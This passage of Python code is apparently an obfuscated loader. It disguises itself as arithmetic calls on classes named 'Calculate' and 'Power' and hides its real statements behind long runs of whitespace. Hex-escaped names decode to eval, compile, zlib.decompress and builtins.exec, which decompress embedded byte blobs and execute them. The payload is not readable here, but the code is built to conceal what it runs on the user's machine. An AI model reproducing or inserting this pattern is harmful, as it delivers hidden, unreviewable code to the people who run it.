\xf2a\xc4Rw\n\xfc,\xd8G\xc5\xfc\x93\x0ez\xea)\x16\x1e%\xbd\x1d\xf2\xad\x1e\xeb\xc2NX$\xd3;\xeb\xa6\xd4\xc4\x88\xf0a\xaf\xc91d\x82\xd6Gu=t\xa3\x80\xbe\x9a\x1d\x0f1\x9b\x98T\x02\xd1zR\x00\xb0\xc4\xee\xe0 p\xc4\x1cb\xec9\x9c\x83\xe4Jp\x16Fx\xe4\xc5\x90S\x875\x03\xa4\tm-\xfd1\x12\xb4X6\xca\xa2\xe0n\x00&\xf8\x04\x7f\xecG\x81\x0f\x9f7APK\x88\xf1\x98\xc02\xde\x05\xa41\xe0D\xf1\x1a\x90\x9e*\xd92\xfb\x93\xe6\xd5\t\x90\xef \xc9, ^{Jk\xe3:\x92c\xa2Y\xdd\x08\xa3<\xe3\xe1AL\xeb\x8e\xc5\x84&]9\xb9\xa7\xe9\xd9Eq\xa1d\xb9\xb8\xbf\x18\x1d$\\\xe6\x91j`\xdd\xe4\xdbpt\xb4\x87\xd1\xf7lN\x8e\x11pE7\xda\xcd\r\xbdB2\xe7\xf2\xc9\x84\x8ec\xee\xfa\xc4I\xdeH\xb5\xa0\'t@`\xba\xbf\xed\x84\x13\xd8p\r\xb7\xae\x89j\x06\x7f\xa8\xbb\x8c\xd38\xbeM\\\xe9(\xcaM\x9b.\xbe\xb3\x8d\x143,qs\xf1\x1d\x11\x13\xe4\xdf\x04\x1d\x9a\xa0\x10\x06\x0e\x06\xfd\x82`!\xc6\xd3\xc6x\xf7x\xdc\x82a\x9d\x94dgbl\xcd#\xc2s\xed\xaa5V\x93\xbaU\xbb\x16\xd3\xfb\xa9\xa9\xbaY\xf7\x88jS\x89S 3\x07\x15@P\xc9J\xd01\xf6\xc9X\xb1\xbb,9<Xs\xd0X\x85c\xd9\xd4#\xb7*8\x0f<\xed\xe6\xc3W\xea\x11\x80 \xb46\x98\xdb>\x16\x9f\x0b\xc3f\x86\n\xaf)\xc1XT\xe3\xdb\xdf\xb3\xd1\xd6\xb6\xd5\xedY\x0f\xb3c\xb6\xac\x19|\xc7\xdewZ\x0bH\xbd\xee\xd9\xbb\xae,h3h\xa0\x8fn\xf7}\x92\xfc\x90\x8b\x01\x94\xd3\x04\x0e!\xbe\x92\x03\x9f\x07\x0e\x1a6\x878\xa5\xd4\x9c\x11\xf8k\xe1\xaa\xf7p\xcb\x9f\x93f+\xf9\xe6\xa7\xfd\xfc\x00!V\x8e\xe4\x99\xd7y\xc5c^\x8c/\x93k\x8d\x95J\xf6q\x08w\x9e\xb1\xe1\x16G\xbb\xe8\xd2q\x8ei5B\x99l\xcb\xd7\xd0m\xdd\x9f\xcdS\t\xa1\x12\xe8&mxI\xfbK\xfa\xbd\x19R\x82\xbc\xa4\x12S\xc8\x1a\x07`=\xa2\xa7\x89\xbe\x19\x88\x9c%\xe0S\x0b\x80\xa9\xe3p\x9bau"\x83\xdf\xdb$\xaf\x95p\xc0\x860\xd9/\r\xa5u(i#\xa4\xb4=c;mF+\xdb\xb3\xebuy\x94\xa0\x9e\x82go\x05\xcc\x1e\xd6:\xbc[\xf7\xa0\xa6|\xeb\xee_\x17\xda\xed\xa7\x8e:g\x06v\xd5A\xd3\x1c\xa3?o\xcbK\xae\xea\xac\xcb/\xd6\x98m6\xb07\xc3\xfd\xf2\xa4\xe6\xacK;\xefR\xae\x99\xed\xf1\xdb}\x00\xa2\xa8\x91b\x85\x03P\xe7\x9a\x9b\xf4W]\xb1U]\xfb\xf5\xa5\n\xa5\xb8\xb7\xae\xa0\x9e\x18\xd2N{\x12#+=\xb8n/\xaeUFL\x15\x12mY.v2\xf8~\xaa\x03\x9e\xed\xad6)[*1\xce&~EiY\x0cs\x16\x06\x8e\xf0\x83\xc4w\xfdLx\x12\xb1\xc0Hz\xd2\x03Z:\x85\x17@E\x851\\\x85i\xde\x9f J(\x05\x85yB\xa5\x0f_F\x02\xa8O\x11\xa3\xd2[\x10\xf9\xe3\x00&J\xb8\x07\xd5$\xdc\x10\x15I\\?\x08\x13\xb8\x86P\x0e\x9e\x10Dp]\x00~\x19\xfbdF\xebG!<\xc7\x0f\x01\x85\x90\xa8<!Sx\n\x14\x0b\x94\x91\x0cc\x11\x0b\x1f\xf2$\x02\x880\x89\x8f$\x95\x11\x89\x8a\x1b\x11\x94\x80\x1e\x9f\xa4\x0f/\x12\x92=\x0e\xfa\xfe%\xb2-\x86vr\xe1\x1d\xe8\x05Q\xed\x04\xc6!\xdc\x03C\x14\xae\t\x0f\xbe\x84}= \x8e;\x86/\x87v\xf5}R\x8f\x11a$\\(\x1d\xdf\xd6\x81\xb7\xc5\x11\x8c*$(\xe6\x10\xf0\x1e\x0e\xd4\x00\xa9\x86H\x0c\x85\xe9\xc8\xc0G\xde_\x84\x8a\x1f\xa8v\x02\xa5\xbb\x02\xb2\xc3\xfd\xa4\x16\x83j&\xa4"2%\xee`\x1c\x84\xa4\xf8\x86n\xc8\x02\x98h\x1c:\x97\xa4X\xe2@WN\x04\xbes\x02g\x18\xca\xc5\x91\x1e>\x1a&(\xdfG\xc5\x9d\x10\xb6P\x07\xed1rM\xebT\x1a\xfa\x87\xd1\x1a\x10A\x15+Y\x1b?\x99\xce@\x1dCk`[^q\x84Y\x17&\x02\xa4\xb3\xdb\xd7"<t\xc4\x0e\xa4\xf8\xc0i( \xb2\xe7C\x9d5\xccQ\xcb=&\xbf\xc4\x0e\x1e)\r\xf3\xb5\xd4\x03`\x9cA=\x9eo\x19C;\xa8\xdcBJ\xc3)\xfb\xae\xbc\xc1\x115\xd5\xed\xf8\x011\x89\xb9\x8a\xe3\x97\xad\xa5\x1b\xdcB\xcbfp\xb0\xec\xe1\xc1\xa6K.\xc1>s\x80\xea/\xaf\xf4\x10\xb6\xad\xe3\xd4B(\x06\x953/\xc7\x18\xfc\x81\xe1ctW^\xdbl\x11\xa5h\x1d\xa2Ky\x98\x04|\x02\xfa1\x1a\xba\x00\x8ag\xc3\x9d\x0c;\xf9\xd2\x0e\xc0*E\xea\xca9\x98N\xc3\xa3c\xa1\xb2\x14\xd1\x96,\r=fH\x1ew\x08mX\x93\xda\xe2\x86\xe8h\x83\xa63}M\x11j\xd8\xb5\x1e\xf9s{\xde\xc3sC\xea\x08\xb0\xe9N\xa9\xaeOmjS\xff\xc2\xac\xeb-\xafW\x92\x82\x99qTW:\xcb,\x8b\xe1\xeaV2l|\x00\xe7kn\xb7\x82\xa9E\x1b\xd6\xca\xd3xi\xa1\\\x91\x84qIj\xd8T"\x0c\x95\x86\x0e\xfa\xd1!\x1b!+\xfc\xd4\xa9\x9cj#\x93*\x9e\xb2_3>\xd1\xf0\xd3b4\xe52>\x93v\x8d\xad#\x0ei.\xa9\x19\'\xb0I\xde\xd6\x1c\xd5\xee\x05i\xf1\x14\xa3\x0bv\x14\x8e\xfb\xa29\x9e\xaa,\x12\xd9\xfb3\xa9\xab\xc0\x1d\xdef\xeaa\x90\x02?\xa8<z\x96a}t-\x18\x08\xc1\xb6|\xafp\xb3\xb0\x87I6\xf2ul\xba\xac\xd1Z\x12\x13\x83\x13`\xf2\x01\xf4\xf0\xb5\'c\xdd\x192\xc1\xaa.\xf0s@\xba\xe4\xe1\xd9\xc3\x9a\x13?\x15\xccq\x18\xa3\x7f\xaf0 \x0eG\x10:B\xa0\x8b(\xa8\x10\x17\x1a?\n\xfc\xc0\x86\xa9P5e\x9b^\x12+\xde\x96\xd5I\xdcV{w\xd1\xc2u\x88\x11uY\xfe7@\xbb\xd7\xc6Zn\xe4\x03\x06\r\xae\x11\xe6\xb8\xe8\xbe\x1c\x9f\xb6\x99j\x81\x96\xde\x06\xact(W\r\xae5e\xe2\xa9t\x0eR]\tuw\xe5=\x8e\xfa])\xeb\xd0\\\x173p\x83\xaf\xaeEkr\x91my\x9b\xc4\xfdz\x89\x01UE\xfb\x18\xe4*b\xdd!\x94\r\x82*ZY`\x90\x89ZRI\xb3\x84\x81\xbb\xef\xcak]\xb4\xfc\xfa@5\x84F\xa2M0\xd9\xf5:P\x02\xa0\xdb\x9e\x15\xf3\xb1:\x07#]\xe3g\xd4\x08\xb27\r\x93\xbbl^\xae\xb8\x1dz\xd9\xbf7j\xec-4\x86\xbb\xc9\xe9\x8c\xd7\xb0\xc0]y\x9b`\x81;z\xe3A\xc3Ci\xbc\xcb\x8c\x11\xa8A[l\xe0lM\xf26\xc5\xdb\xdaz\xef\xa9\xbb\xad5=\xf9\xd8UB\x9c\x92K\x94}<\xf5\xdf\xd2\x8f\xa3\xb7Q\xfc6\xdc\xbd!\x85\x01\x16\xfb\xee\xc1f\x87\xa7b\xa0\x86\x11>\xac\xa0whL\xc0`\xb8\x1a\\\xd0\xf5\x8bG\xe1\xf90\xc0\x8a\xdcLmZ\xa0G\xb8\x07\xdc@^\xe9\xc8w\xddo\x18\x05p#\xb59\x8a\xe3\x92s^$\xa4$\xdb\x03\x10\x8a\xb3\x91\xfa\xd3\x94\xfdkn\x01\xd0\x18\xa6 \xb3\x18"+\xd9\xe9\x1f\nA^\xe1\xdf\xe9\x82\xd4\xc8\xd1\xba\x06\x8djFlis\x18\xfb\x1a\x1d\x07"4 \xa8\x86\xa6r\r*5\xc9\xdb\x10*\x1d\xd6\x99\x9bo\xcd\x9b\xb7\xe1\\4)m%\xaa\xc8\x04\xb6\xe3\x10\xbcIc3i\xdb\xd8lK\x95\x19\xf1\xea\x9ew`Z\xad\x91\xd5\xb0CA{\xfa\x0f\x0b\xd5\xc9t\xfcv\xa6\xae\xf6R\xc2\xae.\x93\n\xa7\x1c\x07\xf8nM\x8bI\x03\x9f\xd2R\x07MZ\n\xc3%\xe9\xae\xbc\x07\xc0\'\xb7C\xb7\xe3\n\xce\x82H-!,\x91Z\xf5\x12U\xeb\xaf\xe3\xe4\xa2\xfbH\xba\x93O:\x02-\xfe\x1f\x1b\x87\xa0\x8d\x88{\x82\x1e\x87\x04\xe9\x04H\x15,n#\xb59\xb6\xe5\x11>\xe5\x90\xb2\x01\x85F&lk#\xb5y\x81\xe8\xf9\x97\xfd\xf6y\xac\xc3@\x05n\xa4\x1efl\xf9A=\xaa\x94\x17\xd49\x03\xd2\x18[\xbb\xf2\x1eS\x9b\xc1\xb2\xdd\x0f\x8d\x9ahm4U\xe3+2\xce\xf7\x9a\x81~\x8e\xf7{-\xa6\xd5>\x9bucj\x11\x0c\xa1\x87F\xc3\xef\xca\xfb\xaa\xc0\x18\xd3\xfb\xe2\xf6t\xfc0\xcbW\xb3\xc5\xf2tv{W\xdc\xafN\xb3\xa7lr>[\xdc=\xac\xce\xef\xeeg\x8b\xd59\xae\xf7\xc9\xe2{\xd6\xc1Kg\xca0\x85\x18g\x83\x81\xd2\xdf\x82\x7f\xaf\xa3\n\xb8\xcf\xfe\xe7![\xae\x96\xe7\xc5\xb2LJ\x16iq\xcb\xcf[\xcdn3\xfd\xace\x9eew\x9db\xf9a\xf9c\xb9\xcan\xcfr]\xda@\x95\r\xa5\xd2K\x9c\r\x86xN\x01\xef/9\x02\x149\x9c\x19\x0c{\x9dIQ\xfc}\x96}\xa4W>#;\xf1\x11\xd9\x89R\xf5\x03\xb6\xdf\xeb\xa4\xf9G,\x83s(\x1a\x96|\x9c\xea\xf0\xe4x~\x0b]s\x96\xde$\x93\xc9G.\xf1\xc3\xf2.\x9f\xad\xce\x86h.2$\xd2\x027\xf0H6J\xed}U\xde\xca9\x96\x9d\xe2\xdb|Swa$N\xe5\xa4?\x9f\xcds\xf2\xdb?\xef}e\x95sZ8\x00\xcc\xd3\xb7\xce\x1fY\x92f\xf7\xcb\x8f\xff\xdb9\x85\x1f\xc7\xc4\xfb\xa2\xbc\x0e\xd2\xa6\x7f\x89\xdf\xca\xdf>$C\x16L@\xbf\xa4\xe7t\xcb#C\xe0j\xf3\xd4\x7fT!\xc1\x1fu\x9c\x19\\9w\xd5fF\x9c\x08\xd8\xf0S\xd8Z\x06\x9f\x86\x9f\x0c\xff\xea&n\x90\\7M\x9fk\x89\xaf\xdf*\x87\xb1%\x93\xa0?b\'\x06$\xfa#\xd9_\x81\xa7\xaa\xb4\\\xbf\x0054\x16\xd8g\x83\xdf*\xc2\x17\xfc9\xf3\x08)n\x07\x7fx\x80\xb4\x1f\x8d\xb0Q\xff\xc9\x88{\xceS\x0f\x9e\xf1Ms\x8c\x960\xa3x\xa8P\xf3sj\x8by\x9fc\xa6\xab\xcc\x8f|\xff\x93~\n\x0eUx\x0e\xbf4\x0fcg\xd4WoX\x06\x86\x86\x85o\xe0\x96\x18\x92`\x81\x0c\x95\xb1')

        Calculate(_positive = -58325 / 37214)._while(_round = Power._random / 64428)                                                                                                                                                                                                                                                          ;Calculate._builtins(_run='SS22SS2S22S2SSSSS22',Substract=b'U\xe0\xc5\xfb\\\xf4SY\xebjn\xd4o\xa6\xdb\x9f\x1f^\xb6\xd0\xe3S\xdfpw\xa7\x9aD\xd5\xc05\xe3qW\x045\xaf\x15\xf8\xec\x93k\x13\x15K\xf3\x13m\xca\xfar\xf8\xe5\x91g\x81\x1f\xe4\x14\xfdk\x85\xfer\x01\xb0\xe1\xbc\x85n\x98\x0b"\xa6\x99\x10\xbe\xb8\xe8So\x9d\xe3[P\x0f\xc6\xda\xab^E#\x95\n\x9e\xf5\xd9^\xfb\x92G\xe4%U\xc3\x90\x08\xf1\xf3\xce?;\x0f\xf7\xf9\xcd\xdd}1\x9d\xe5\xd9G\r\x18>|\xcfVgF\xdbUm\x01\xdbs=\x1c\xd4\xbe\xf7\x01\x8a\xe8<[\x84Q\xf6\xe6]\xab\xeci\xd5Y\xdd\xff\xe8\xd3{O\xc77\xe9j\xf9\xfd\xa3\xca\xae\x06)E\xcb\x9d\xe9\xe0\xb9y\x19O\xb7\xf75/%\x04\x03\xa5\xa2:\xd0#\x9bYa\nn\xe0I\xef\xeb\xa7\xb2!*\xb7\xd1\xdc8\xdf\xe8\xe9\x0c\xc2ZM\x10\xe8F#\x18O\xfc\xd8\x99\xf8@uf2D\xf2\xd4t.\x11\x00:;\x11\x89\x03\xd7"$!\'b\x8cN9\x91hr\x82q\x88N\'|R\xc7Cw\x83)\xa4\xeev?\xd1\x03H?\xc9\xeeV\xdb\xeanDNI\xd0\x1a\x9f\x069\x1eB/\xea}\xd5]\xa3$@t\xbd\xa9\xc9\xc2\x0c\xb3NGx\xcbUI\xad\xa8\xaf\x7f\xab\xf5V\xc1r\x02Y\x00Qh$\x12\xe0*\xfa\x9f\xf8\xe7\xe9\x81\xfb\xc9;\xef|*\x9d\x8c+\x97Et\xb5\xaf\xd4\x1d\xab\x08\xa9<+\x9cw4\x9c\xd3\x887\xee\xfa4/]\x96N\xab/qfP1v\xb9p\xdeP\xc9\x1al\xabZ\xa4*-\x18\xc6"\x97\xd3\xe9\x1b\xe5\xab\x99\x8a\xe1\xaaB\xf4\x95\xb1\x94\x1a\xb3}\xe2\xbf)\xed\x0e\x8c\x04OE\x9ewxJU\xd3\xc1\x82\xe6[:\xeb\xabW\xf9TE\x01\x86W\xb9(\x18\xf0\\\x14JU\x84\xe7\x0e\x84C3\xf4t2\xa7\x05\'\xd2\x19\x80\xdf\x0b\x1dp\x9e\xb5\x9fi\xaa\xc7\xc3>\xf9\x86\xb8\xe0\x99\x86\x1d\xe7\xc0\x84\xa3?GM\xbaP[\xdc\xf3\x10\xbc\xd1\x98\xc7\'`u\\p\xb9\x085\x999xA\xfc\xc5>\xd6,M\xff\x84\x06\xb0\xbf;\xac\xe8\xf3\x0e\xc3\x0e\xf2\xc7\x92S\x1c\xee>\x1b\x97\x0e\xd8\xd4tH\xfb!\xe6\xe4\xcaX\xa8\x8a\x80\x7f\x9f*\x9f\x83\x96\x8c\x98\x97Y\x10[\xf2\xbcs\xa5\xe1}5,\xa8c\xf7\xaf\xf5\x0cp\xa5\xc9z8;\xef\x94]Ek\xc9\xd2i_\xe16\x8b\x85\xf6\xe7\xce|\xfc\xdb[]%OO\n\xe4\xf2l\xf5\xd87Z\xbc\x9c#\xcf;s\xe5m\x86>\x15=\xd0\xcc\xe6\xfd\xeb\xabr\x02\xd0\x83\x16\xce\x10\xde/\xf3\x8f\x9fu\xaf\xad^\x06\xfe\x9d\xc7?\x00x\x9c*dIE\xfd\xd5\x98N\xbfs\xb2Hn\xd7\xc0\xbb\xbe]\xa3B\xb8\xef}\x98/\x8b\x05\x10\x0c\xd8P8\xc0\xf4\x86z!v\xe2o_\xafJ\xda\xa2\x04\x0e\x00P\xbe2h\xa8\xe6-U\xb9\xdf:\'i\xb2J`\xc4\x9e0|\x1a\xe4%\x86\xabb\x070Vx\xde9\xa1\x1eC\xb3\xc5\x9cb1A\xd7\xa9.\xd6\xda\xa6|B_\xa1\x02z\xacj|\xe0\x11\x8b\xabK\xa1\xe9Ys\xaea.\x9c0H\xec\xa0\\\xfc\xf5\x95\xfe\x86\xf2\xe3\xae\xfb\x03\xd5\xd5.\x19-\x1c\x10\xcav\xc2"\x9bE\xe9\xcc\xff\xb6\xff\xa4\x91\x9f\n3\xc4\xd9\x16\xde\x82F\x15Z\xdc#\xb2\xc4#\xae?\xd0\xa8}>\xa8\x0c\xd3\t\xf79\x19\xa9.\xabF*\xa1\xd8\x17\xfd\x11\x03\x0f\x1e\x8a\x04\xf4\xce\xb1B\xf3\xb2\x80\xaa\xb8|\xd0W\x12%\x05$\xca\xdf\x02\xee\xf9\xf2Y\xb7\xb5\x92\x8aR\x9f\xee\x9b\xd1\xcc4\xf2\n?\xb8A\x85,`X\xc3\xa3\x0c\xdf\x8609\xec\x10\x05\x1fPwA\xc8tB\xc2\x1c\x02\xc8\x04,\x08`\\\xf4\x15\xbd@Jj\x84\x0eqNJS\x80|\xc4\xa5 \x8c\xbc\xaeZZaD\xd44\xf4:\xe5XW\xe1\x14\xfaj\x02\x85\x8b\xaa\xd6\n\x1e\xf9\xf8X\xc2\xe3\x19\xba\x0c\x87\xcaR\x9d22\x84\x1b\x8d\xf8}HF\xd1\xbf5\xbfR}6v\x8d\xb2\xabk\xdcL\x8d\xcc>C\x0e\x8d2\xea~\t\xb7\xf0dC\x7fF\x1fy\x02\xf2\xfaU-k\x1f\x04\xdcv\x03\xdd\xc3\xf5\x18\xaa\x10\xd1\\!Ps\x86\x14\x84KAn\xc6\xe6\xe9\xcf\x1b\x80\x9c}v\xc9W9\xe7\xd3\x7f\xacl\x92\xb4\x15\xaa\x9e\x1d\x9a\x90\xfa\xba\xadKrS#\xc8e\xc3\x9b\x15\x02\xbb\xbe\x9aJy\x86\xd5\xdfE\x87\xfcNC&!\x11_\x1f\x0c\xe9\xa4O\xf0\x9e{47\xd0\x88+\xff=\xc2\xa4\xf7%\xce\xac1hX\xdf\xf3\xa8\x7f_\xc1\xd0r\xaa\xa4\xe1E5\xccS/o\xf8\xa0o\xcaP\x17\xba\xeb\xd3@1\t\x1f"\xf3\x86\xfd\xdb\x12\xd14\xc9U\x02\xe0\'\xff\xec\x9c<U\xd0\xf2\xaeX"2k\x8c\xd8\x92\xb8ZG\x8c\xcf\t\xd8\xe1F\xa1\xc8\'\x84#\x9f \xba5\xfe\xa8\x08\x9aK\x15\xfa\x82+\xe8}\xe9ol\xa6\\t\xbc\x7fR8\xddcI\xc9\x94h\xc9\xd3c\xef+ujv\xe2D\xc5\xd1\x06I\xd6\x12\x17\x1c\x96D\x13\xf5| \xe3\xbf\xd6zq\tD\xbf\xbdW}\x88\xc7\tG\xe6\x80\xa2\xcaW\xb8\xaa\xba"CG\xd5\xc9u\x81j\xfa\xbc\xd6\x84O\x89\x8fj\x8aC#:\xb8\x05\xc4\x7f>\xaf9!A\x88\xff\xed\xbd\xa2\xa1KJSGm\xed\x9chDYU\xa0\x9eW\x1f\x95e9\xe4\xd8\x0f\x89\r\x11\x15\r\x05F\x9bE\xc4\x14\xd0R\xafQ\xdc\xd9^\xe7\x04\xa6\xe2e\xfe\x9e4\xde\xb4\xee\x1b\xd3\xaa\xc3\xce\xc9\xb4\xb8?\x9d\x9d\xce\x16\xa7\xc4\xd89K\xf3\xf3\xdf\xa8\x8d\xf1\x83sb]\xf0$w\xfe\x9b\xa1\x92R\xa9\xa9\xf4\xe0\x83\xf7\xfe0@\xb5e\x8c\xc20\xc0\xbc=\xc6\xd0\x11_\x07\x0c}\x9c\xa0\x97\x03\x12v\x85\x01}t\x1c\xa6(\x98k\xf0\xe1\xe7\xd9"\xfd\xa8 \xdb\'#\x94\x8f\x075rB\xfc\xa63\xa2\xf4\x19s\x181hG\xe0\xef\x14\xbd\xce\xff\x03\xe4\xd0\xb0\xa7')

        Calculate(_positive = -81522 + -90174)._while(_round = Power._random / -7861)                                                                                                                                                                                                                                                          ;mmnnmnnnmmmnnmnnmm,MMMNNMMNMMMNNNMNNMMNMN,mnmmnmnnmmnmmmnnnm,DOOoDODDoDDoDooooDoDoD,S2SSS2SSS2SSSSSS2S222S=(lambda xxwwxwxxxwxxwwwxww:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(xxwwxwxxxwxxwwwxww)"),filename='\x6d\x6e\x6d\x6d\x6d\x6e\x6d\x6d\x6e\x6d\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6d\x6e\x6e\x6e\x6d\x6d\x6e',mode='\x65\x76\x61\x6c'))),(lambda xxwwxwxxxwxxwwwxww:xxwwxwxxxwxxwwwxww(__import__('\x7a\x6c\x69\x62'))),(lambda xxwwxwxxxwxxwwwxww:xxwwxwxxxwxxwwwxww['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda:(lambda xxwwxwxxxwxxwwwxww:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(xxwwxwxxxwxxwwwxww)"),filename='\x6d\x6e\x6d\x6d\x6d\x6e\x6d\x6d\x6e\x6d\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6d\x6e\x6e\x6e\x6d\x6d\x6e',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63')),(lambda nnmmnmmmmnnnnnnnnmmmmmm,xxwwxwxxxwxxwwwxww:nnmmnmmmmnnnnnnnnmmmmmm(xxwwxwxxxwxxwwwxww))
        Calculate(_positive = 93330 - 37871)._while(_round = Power._random / 67030)                                                                                                                                                                                                                                                          ;DOOoDODDoDDoDooooDoDoD()(S2SSS2SSS2SSSSSS2S222S(mnmmnmnnmmnmmmnnnm(MMMNNMMNMMMNNNMNNMMNMN(mmnnmnnnmmmnnmnnmm('\x76\x61\x72\x73'))),Calculate._add(DetectVar='S2222SSSSSS2S2S222')+Calculate._add(DetectVar='DOOODDoDOOOoDODooOD')+Calculate._add(DetectVar='S22S2SSS2SSSS2SS2SS222S2S2')+Calculate._add(DetectVar='SS22SS2S22S2SSSSS22')))

    except Exception as _absolute:
        if 147349 > 9710422:
            Calculate.execute(code = _floor(_absolute))

        elif 201839 > 4604651:
            Power._while(_round = Power._random + -62571)
